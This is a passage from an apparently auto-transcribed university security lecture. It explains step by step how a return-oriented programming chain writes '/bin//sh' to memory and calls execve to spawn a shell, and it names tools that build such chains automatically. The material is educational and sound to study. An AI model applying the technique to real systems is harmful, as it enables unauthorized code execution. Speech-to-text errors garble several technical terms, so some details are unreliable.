address of data plus eight, right? So the four bytes that are after that, we're gonna x or eax with itself, which cancel which makes it zero. And then we're going to call our gadgets. So here now we have a null terminated string in memory slash bin slash slash sh. So now we we have that which is the first argument to exactly ER system call. We now need to build up this RV vector. I'm going to kind of I think this is getting a little bit redundant. We essentially use our gadgets to set up the rest of these vectors. We have a null there as well. And now we call execde with the address of dot data, the address of data plus 12, the address of data plus eight. All this fun stuff. And now we need to set eax to be 11. So you can see it's kind of ridiculous. We clear out eax to zero and then we increment it 11 times. So we just do this 11 times to get eax to be 11. And then call it 80. Okay. And the final part of our Python script, we're going to print out this payload, which we can then type in as the argument. So let's actually walk through this and we'll make a lot more sense. So now we can create a Python script called exploit.py. We can run it and set a breakpoint right at the end of the lead function. So now we've overwritten a ton of the stack, right? Not just a little bit, but we've controlled the vast majority of the stack. So at the return, it's going to go to this 0806 E910, which was our first gadget. So going there, so these are all the gadgets just kind of laid out next to each other. So what is it going to do? Pop edx. So pop that value on the stack. So now edx, this was the address of .data. Return from that. So now start executing at this next gadget is pop ex. Pop that value off the stack return. So now we have the string slash bin slash sh in eax. We're going to now call this gadget to copy that there. Return. Do the same thing to do the next string slash slash sh. Then we're going to XOR eax. So make eax 0. Now we're going to write out 0 to address about that of plus 8 past that. We will keep going through this. So now right before we get to the n80, we can do a breakpoint. We can look at this string that's at this address. We can see that this is the string slash bin slash slash sh. We can look at the two words here to make sure that that's set up correctly, our arguments here. And we can now see that we continue. We've executed this new program bin dash. We've essentially tricked using little bits of the program's code. We've tricked it into exacting slash bin sh with these arguments. So this is completely independent of any address space layout randomization. This is a super cool technique. The nice thing is you don't have to do this by hand. So there are automated tools to do this kind of exploitation. Pwn tools, rock gadget, romper are all tools that you can run on a binary that will tell you sometimes all the different gadgets and or definitely all the gadgets and sometimes will automatically build that rock chain for you. So I was, you know, how we actually built that was you can run it through this tool and it will try to build it for you. Also going into words of this, Pwn tools is a very comprehensive library used by a lot of the top CTF teams. That's actually we're at the end of stuff. So I will not be here on Thursday. I'm going to try to get a guest speaker who's a security professional, but we'll keep you posted. So what's going to happen on Thursday? No office hours today. It's been a good semester. See y'all at the final.